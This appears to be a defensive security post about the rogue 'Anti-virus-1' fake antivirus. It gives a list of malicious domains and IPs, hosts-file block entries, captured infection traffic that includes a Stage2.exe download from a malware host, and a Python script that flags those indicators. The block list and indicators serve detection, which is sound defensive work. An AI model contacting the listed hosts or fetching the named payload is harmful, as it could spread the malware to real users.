Block Anti-virus-1 malicious Domains

Anti-virus-1 is classified as rogue security software: a fake anti-spyware application that claims to be the best at removing trojans but in reality does nothing. Below is a list of the malicious domains used to spread and promote Anti-virus-1:

70.38.19.201 (online-download-av1.info)
70.38.11.165 (gravicapa.globmail.org)
70.38.19.201 (online-site-av1.info)
67.205.75.10 (online-scanner-av1.info)
N/A              (antivirus1-site.info)
N/A              (antivirus1-download.info)
N/A              (av1-site.info)
N/A              (av1-download.info)
N/A              (av1-scanner.info)

To block the above domains and IPs, edit the Windows hosts file located at C:\WINDOWS\system32\drivers\etc\hosts and add these lines:

127.0.0.1 70.38.19.201
127.0.0.1 online-site-av1.info
127.0.0.1 online-download-av1.info
127.0.0.1 70.38.11.165
127.0.0.1 gravicapa.globmail.org
127.0.0.1 antivirus1-site.info
127.0.0.1 antivirus1-download.info
127.0.0.1 av1-site.info
127.0.0.1 av1-download.info
127.0.0.1 online-scanner-av1.info
127.0.0.1 67.205.75.10
127.0.0.1 av1-scanner.info

With these changes, all the listed domains and IPs are redirected to 127.0.0.1 (localhost), so the trojan will not be able to download the malicious .EXE file from the domains listed above.

Observed Internet traffic on port 80 (HTTP requests sent by the infection):

GET /admin/cgi-bin/get_domain.php?type=site HTTP/1.1
User-Agent: AV1
Host: 70.38.11.165
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
 
GET /collection.php?step=AV19_GetId_failure&id=none HTTP/1.1
User-Agent: AV1i
Host: online-site-av1.info
Connection: Keep-Alive
Cache-Control: no-cache
 
GET /collection.php?step=AV19_stage_one_complete&id=none HTTP/1.1
User-Agent: AV1i
Host: online-site-av1.info
Connection: Keep-Alive
Cache-Control: no-cache
 
GET /en/exe/Stage2.exe HTTP/1.1
User-Agent: AV1i
Host: online-download-av1.info
Connection: Keep-Alive
Cache-Control: no-cache
 
GET /admin/cgi-bin/get_domain.php?type=site HTTP/1.1
User-Agent: AV1
Host: 70.38.11.165
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

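The captured requests above carry reusable detection indicators: the Host values from the domain list, the AV1/AV1i User-Agent, and the get_domain.php, collection.php?step=AV19_ and Stage2.exe paths. The following Python script is an added example, not code from the original post: it parses a raw request capture like the one above and reports which indicators fire for each request, using a sample capture constructed from two of the page's requests plus one benign request.

```python
import re

# Indicators taken from the domain list and the captured requests on this page.
# The IP literals are included here because a hosts file only affects name
# resolution; requests sent straight to an address need a network-level control.
KNOWN_HOSTS = {
    "online-download-av1.info", "online-site-av1.info", "online-scanner-av1.info",
    "gravicapa.globmail.org", "antivirus1-site.info", "antivirus1-download.info",
    "av1-site.info", "av1-download.info", "av1-scanner.info",
    "70.38.19.201", "70.38.11.165", "67.205.75.10",
}
AV1_PATHS = (r"^/admin/cgi-bin/get_domain\.php\?type=site$",
             r"^/collection\.php\?step=AV19_", r"/Stage2\.exe$")

def parse_requests(capture):
    """Split a raw capture into (path, headers) pairs, one per request block."""
    requests = []
    for block in re.split(r"\n\s*\n", capture.strip()):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if not lines or len(lines[0].split()) != 3:
            continue  # not an HTTP request line
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append((lines[0].split()[1], headers))
    return requests

def classify(path, headers):
    """Return the names of the indicators that fire for one request."""
    hits = []
    if headers.get("host", "").lower() in KNOWN_HOSTS:
        hits.append("known-host")
    if headers.get("user-agent") in ("AV1", "AV1i"):
        hits.append("av1-user-agent")
    if any(re.search(p, path) for p in AV1_PATHS):
        hits.append("av1-path")
    return hits

def scan(capture):
    """Return [(host, path, hits)] for every request in the capture."""
    return [(h.get("host", ""), p, classify(p, h)) for p, h in parse_requests(capture)]

# Constructed sample: two requests copied from the page plus one benign request.
SAMPLE_CAPTURE = """GET /admin/cgi-bin/get_domain.php?type=site HTTP/1.1
User-Agent: AV1
Host: 70.38.11.165

GET /en/exe/Stage2.exe HTTP/1.1
User-Agent: AV1i
Host: online-download-av1.info

GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0
Host: www.example.com
"""
```

Running `scan(SAMPLE_CAPTURE)` flags the first two requests on all three indicators and leaves the benign request clean, so an empty hit list is the expected result for ordinary browsing traffic.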